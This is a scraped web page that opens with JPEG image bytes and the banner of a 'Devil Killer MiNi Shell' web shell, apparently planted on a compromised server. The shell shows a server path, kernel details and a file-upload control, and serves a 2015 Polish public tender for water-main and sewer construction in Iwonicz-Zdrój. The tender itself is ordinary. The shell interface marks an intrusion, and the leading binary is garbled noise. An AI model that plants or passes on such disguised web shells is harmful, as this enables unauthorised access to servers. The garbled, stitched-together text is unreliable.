JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150121/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150121/8465-N-2015.html

<p class="kh_header"><b>Iwonicz-Zdrój: Budowa odcinka sieci wodociągowej z przyłączami do budynków mieszkalnych w Iwoniczu oraz Budowa odcinka sieci kanalizacji sanitarnej z przyłączami do budynków mieszkalnych w Iwoniczu</b><br>
<b>Numer ogłoszenia: 8465 - 2015; data zamieszczenia: 21.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Iwonicz-Zdrój , Aleja Słoneczna 28, 38-440 Iwonicz-Zdrój, woj. podkarpackie, tel. 13 435-02-12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iwonicz-zdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa odcinka sieci wodociągowej z przyłączami do budynków mieszkalnych w Iwoniczu oraz Budowa odcinka sieci kanalizacji sanitarnej z przyłączami do budynków mieszkalnych w Iwoniczu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

1. Planowane przedsięwzięcie w zakresie branży sanitarnej zakłada wykonanie odcinka sieci wodociągowej oraz grawitacyjnej kanalizacji sanitarnej mającym na celu doprowadzenie wody do gospodarstw domowych z istniejącej sieci wodociągowej jak również odprowadzanie powstających na tym terenie ścieków bytowych do istniejącej kanalizacji sanitarnej. 
W ramach projektowanego przedsięwzięcia planuje się:
a)   podłączenie projektowanego odcinka  sieci wodociągowej do istniejącej sieci wodociągowej w110 na działce o nr ewid. 197 w miejscu oznaczonym na planie zagospodarowania terenu jako węzeł /T/. Ze względu na istniejący układ wysokościowy na terenie objętym uzbrojeniem wydzielono dwie zlewnie ścieków bytowych, które zostaną włączone do istniejącej sieci kanalizacyjnej. Pierwsza zlewnia włączona będzie na działce o nr ewid. 197 do studzienki oznaczonej na planie zagospodarowania terenu jako Sist, o rzędnej 295,13/293,37 i obejmuje  ona kolektory grawitacyjne sieciowe z rur O200mm PVC-U oznaczone jako S1 - S33 oraz K-1 do K2. Druga zlewnia ścieków bytowych  włączona będzie na działce o nr ewid. 467 do nowo projektowanej studzienki S34  i obejmuje  ona kolektor grawitacyjny sieciowy   z rur O160mm PVC-U oznaczone jako S34 - S35 - K3. 
 b)  przyłącza  wodociągowe  do  3  budynków:
-  dwa przyłącza  do  budynków  od  węzła W8  i  W10  w  zakresie  wyprowadzenie  rury  przyłącza  na  odległości  1,5 m  poza  granicę  nieruchomości  podłączanej  do  sieci  wodociągowej,
-  jeden  przyłącz  do  budynku  od  węzła  W29.1  w  zakresie  wyprowadzenia  rury  przyłącza  na  odległość  1,5 m  od  węzła
Przyłącza  wodociągowe  wykonać należy  z  rur klasy PE80, SDR 11, PN 12,5 średnicy           fi 40x3,7 mm
Każdy  przyłącz  należy  zakończyć  zasuwą  miękko uszczelnioną z trzpieniem w oryginalnej obudowie  z umieszczeniem zakończenia trzpienia w skrzynce ulicznej obetonowanej na poziomie terenu,
c) przyłącza  kanalizacji sanitarnej do 3 budynków  od  węzła  S9, S10, S32  w  zakresie  wyprowadzenia  rury  kanalizacyjnej  na  odległość  1,5 m  poza  granicę  nieruchomości  podłączanej  do  sieci  kanalizacji  sanitarnej.
	Przyłącza  kanalizacji  sanitarnej  wykonać  należy  z  rur  PVC  szereg N. SDR 41 średnicy 160x4,0mm,
	Każdy  przyłącz  należy  zakończyć  korkiem  na  uszczelkę  gumową  o  średnicy  rury.
d) odtworzenie nawierzchni dróg publicznych i wewnętrznych zgodnie z warunkami zarządcy   dróg oraz dokumentacją projektową. Na terenach zielonych (poza pasem drogowym) odtworzyć warstwę humusu,
e) inspekcję  CCTV  kolektorów  kanalizacyjnych będącą elementem  kontroli  jakości  wykonanych  robót zgłaszanych do odbioru częściowego  lub  końcowego  przez  Wykonawcę. Polega  na  analizie  techniczno - jakościowej  wykonania  robót  dotyczących  przewodów  podziemnych  bezpośrednio  przed  ich  odbiorem. Materiały  z  inspekcji  CCTV  powinny zawierać  część  wizyjną  i  dokumentacyjną:
- część  dokumentacyjna  określająca datę  rozpoczęcia  i  zakończenia  inspekcji, oznaczenia  odcinka, wskazanie  osób  bezpośrednio  wykonujących  prace, wykresy  spadków  rzeczywistych  i  projektowanych, oznaczenie  odstępstw  i  ich  wartość, uwagi,
- część  wizyjna  określająca obraz  z  kamery  zawierający  datę  realizacji  inspekcji, oznaczenie  odcinka, chwilowe  wskazanie  spadków, w  plikach  odrębnych  dla  każdego  odcinka.
Inspekcję  CCTV  należy  realizować  w  sposób  umożliwiający  jednoznaczną  identyfikację  przewodu  ruchem  jednostajnym, bez  przerw  w  obrazie  w  ciągu  odcinka. Przeglądany  przewód  należy  prawidłowo  oświetlić  i  jednoznacznie  oznaczyć  również  na  obrazie  cyfrowym. Połączenia  rur  na  odcinkach  przewodu  należy  szczegółowo  poddać  analizie  wizyjnej  w  celu  potwierdzenia  prawidłowości  ich  wykonania. Przegląd  wykonać  ruchem  jednostajnym. Miejsca  istotne  w  zakresie  zmiany  średnicy, materiału, istotnej  zmiany  spadków  oznaczyć  na  obrazie  wizyjnym. 
Inspekcja obejmuje do 100%  wykonanych przewodów. Prowadzone  badania  muszą  być  przeprowadzone  w  taki  sposób, aby  bezsprzecznie  wykazać:
- szczelność  każdego  z  połączeń  rurociągów,
- właściwe  i  jednolite  spadki  odpowiadające  założeniom  dokumentacji  projektowej,
- jakość  zastosowanych  materiałów,
- brak  zatorów  i  zabrudzeń  przewodów.

Szczegóły  realizacji  należy  uzgodnić  z  inspektorem  nadzoru  i  przyszłym  użytkownikiem  przed  rozpoczęciem  inspekcji  CCTV. Należy  zwrócić  uwagę, że  w  przypadku  rozbieżności  pomiędzy  częścią  dokumentacyjną  i  wizyjną  całość  materiału  podlega  odrzuceniu  bez  możliwości  ponownego  wykorzystania.

Jakiekolwiek  nieprawidłowości  wykazane  w  materiałach  z  inspekcji  stanowią  podstawę  do  uznania  przewodu  za  wykonany  nieprawidłowo  i  żądania  od  Wykonawcy  naprawienia  usterek  na  jego  koszt. Po  usunięciu  nieprawidłowości  należy  przeprowadzić  ponownie  inspekcję  CCTV. Koszty  inspekcji  przewodów  pokrywa  Wykonawca.
Przed  przystąpieniem  do  inspekcji  CCTV  przewód  należy  wyczyści, a  ewentualne  włączenia  zablokować. Inspekcję  CCTV  należy  przeprowadzić  przed  odbiorem  branżowym  danego  odcinka  w  terminie  uzgodnionym  z  inspektorem  nadzoru. Materiał  wynikowy  (obraz  wizyjny  i  dokumentację)  przedstawiany  do  odbioru  branżowego  zawiera  inspekcję  przewodów  i  studni, a  także  ich  oznaczenia  zgodne  z  dokumentacją  projektową. 


 Planowany  zakres  rzeczowy:
       -  kanalizacja  sanitarna  fi200 szereg /N/				 	-	   677,00 m
       -  kanalizacja  sanitarna  fi 200 szereg /S/					-	   223,90 m
       -  kanalizacja  sanitarna  fi160 szereg /N/					-	     59,40 m
       -  przekroczenie drogi gminnej publicznej przewiertem sterowanym		-    	     38,70 m
          z rurą PE100 225x13,4 mm, SDR 17, PN10  	
       -  przyłącz  kanalizacji  sanitarnej fi 160 szereg /N/ (3 szt.)	 		-	       4,50 m
       -  sieć  wodociągowa PE szereg 100, SDR 17, PN 10  fi110x6,6 mm	             -	   980,90 m
       -  przyłącz  wodociągowy  fi63 						-	     21,00 m
       -  przyłącz  wodociągowy  fi40 (3 szt.)					-	     10,00 m
       -  przekroczenie drogi gminnej publicznej przewiertem sterowanym		-    	     34,50 m
          z rurą PE100, SDR 17, PN10 RC  fi110x6,6 mm  	
       -  odtworzenie drogi gminnej o szer. 3,5 m					-	     99,00 m
       -  odtworzenie przejazdów przez drogi 					-	     35,00 m
       -  kamerownie kanalizacji sanitarnej	- 	999 m



Szczegółowy zakres prac obejmujący  przedmiot zamówienia został określony w załączniku nr 9 - dokumentacja projektowa (całość dokumentacji), specyfikacje techniczne, przedmiary - załącznik do pobrania ze strony internetowej Zamawiającego.


UWAGA!
W przypadku użycia w dokumentacji przetargowej (SIWZ wraz z załącznikami) nazw własnych, norm, technologii, narzędzi, materiałów itp. należy je traktować jako przykładowe mające na celu doprecyzowanie przedmiotu zamówienia oraz określające standard techniczny i jakościowy. Technologia, narzędzia i materiały do wykonania zamówienia należy przyjmować w kategorii jakości nie niższej (równoważnej) niż ta wskazana w SIWZ i załącznikach do niej. Przy zastosowaniu zmian, Zamawiający wymaga złożenia wykazów z informacjami uwiarygodniającymi przyjęte rozwiązania (wskazanie nazw, symboli i parametrów technicznych). Brak wskazania w ofercie proponowanych zmian (w dowolnym miejscu w swojej ofercie i w dowolny sposób, np. na osobnym wykazie) wraz z podaniem rozwiązań zamiennych proponowanych przez Wykonawcę, skutkuje brakiem możliwości zmiany stanowiska Wykonawcy w tym zakresie przy zawieraniu umowy i uważa się za równoważne z tym, że zamówienie zostanie wykonane zgodnie z rozwiązaniami projektowymi  zaproponowanymi  przez  Projektanta  w  dokumentacji  projektowej stanowiącej załącznik do SIWZ. Każdy rodzaj robót, w którym znajdują się niezbadane i nie zaakceptowane materiały Wykonawca wykonuje na własne ryzyko, licząc się z ich nie przyjęciem i nie zapłaceniem. 

3.2.  Zaleca się aby Wykonawca dokonał  wizji lokalnej placu budowy, zapoznał się z przed?miotem zamówienia.
3.3. Okres gwarancji udzielonej przez Wykonawcę musi wynosić co najmniej 60 miesięcy. Ustala się okres rękojmi równy okresowi gwarancji..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość  udzielenia zamówień uzupełniających przewidzianych dla zamówienia podstawowego i dotyczących przedmiotu zamówienia w niej określonego, 
a stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia, Zamawiający w oparciu o przepisy art. 67 ust. 1 pkt 6 ustawy Pzp, powierzy ich wykonanie w trybie zamówienia z wolnej ręki.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9, 45.23.00.00-8, 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony o ile Wykonawca wykaże wykonanie zgodnie z zasadami sztuki budowlanej i prawidłowe ukończenie  - w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej polegającej na budowie lub przebudowie lub rozbudowie grawitacyjnej lub tłocznej kanalizacji sanitarnej,  o wartości tej roboty nie mniejszej niż 100 000,00 zł brutto (sto tysięcy złotych). 
W celu wykazania spełniania warunku Wykonawca zobowiązany jest złożyć:
a) wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu   składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich:
- rodzaju,  
- wartości,
- daty i miejsca wykonania,
b) dowody dotyczące najważniejszych robót, określające czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Przez roboty najważniejsze zamawiający rozumie wykazanie się ww. robotami o wartości i ilości niezbędnej do spełnienia warunku udziału w postępowaniu. 
Dowodami, o których mowa powyżej są:
a) poświadczenie;
Zgodnie z wytycznymi UZP /poprzez poświadczenie należy rozumieć dokument potwierdzający określone fakty lub wiedzę wystawcy, którego wystawcą nie jest wykonawca. Poświadczeniem będą zatem zarówno dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane zostały wykonane, np. referencje, jak i dokumenty wystawione przez inny podmiot, który posiada kompetencje, by poświadczyć określone fakty/. 
b) inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej;
UWAGA!
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane  wskazane w w/w wykazie zostały wcześniej wykonane - Wykonawca nie ma obowiązku przedkładania dowodów, 
o których mowa powyżej t.j. - dowodów dotyczących najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazując, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

W przypadku składania oferty przez Wykonawców występujących wspólnie (konsorcjum, spółka cywilna) w/w warunek mogą oni spełnić łącznie
Ocena spełniania tego warunku w postępowaniu odbywać się będzie na podstawie dokumentów 
i oświadczeń przedłożonych przez Wykonawcę, metodą warunku granicznego spełnia nie/spełnia. Oznacza to, że wystarczającym powodem do wykluczenia Wykonawcy może być brak 
w ofercie wymaganych oświadczeń i/lub dokumentów oraz ich nieuzupełnienie we wskazanym przez Zamawiającego terminie, w trybie art. 26 ust. 3 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował: 

	
a)	przynajmniej 1 osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych z minimum 2-letnim doświadczeniem zawodowym.
 

Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem ort. 12a oraz innych przepisów ustawy Prawo budowlane (Dz.U.2013., poz. 1409 z póź. zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008r. Nr 63 poz. 394).
		
W celu wykazania spełniania warunku Wykonawca zobowiązany jest:
a) złożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności,
b) złożyć oświadczenie stwierdzające, iż osoby wymienione w wykazie posiadają wymagane przez Zamawiającego uprawnienia,
c) podać informację o podstawie dysponowania osobami ujętymi w wykazie.

W przypadku składania oferty przez Wykonawców występujących wspólnie (konsorcjum, spółka cywilna) w/w warunek mogą oni spełnić łącznie.

Ocena spełniania tego warunku w postępowaniu odbywać się będzie na podstawie dokumentów  
i oświadczeń przedłożonych przez Wykonawcę, metodą warunku granicznego spełnia nie/spełnia. Oznacza to, że wystarczającym powodem do wykluczenia Wykonawcy może być brak 
w ofercie wymaganych oświadczeń i/lub dokumentów oraz ich nieuzupełnienie we wskazanym przez Zamawiającego terminie, w trybie art. 26 ust. 3 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta powinna zawierać:
- formularz oferty wykonania zamówienia, (załącznik nr 1),
- oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu,(załącznik nr 2),
- oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania, (załącznik nr 3),
- dokumenty i pozostałe oświadczenia wskazane w ust.  6 niniejszej specyfikacji,
- pisemne zobowiązanie - jeżeli dotyczy,
- jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1
ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust.
2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w ust. 6 pkt 6.2 siwz,
- stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie  wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru,
- informację, w formie oświadczenia o braku przynależności do grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, którego wzór stanowi załącznik nr 3a do SIWZ. W przypadku przynależności do grupy Wykonawca zamiast informacji składa listę podmiotów należących do tej samej grupy kapitałowej,
- w  przypadku Wykonawców  wspólnie  ubiegających  się  o  udzielenie zamówienia,   dokument  ustanawiający  Pełnomocnika  do   reprezentowania  ich   w postępowaniu o udzielenie zamówienia  albo  reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres Gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
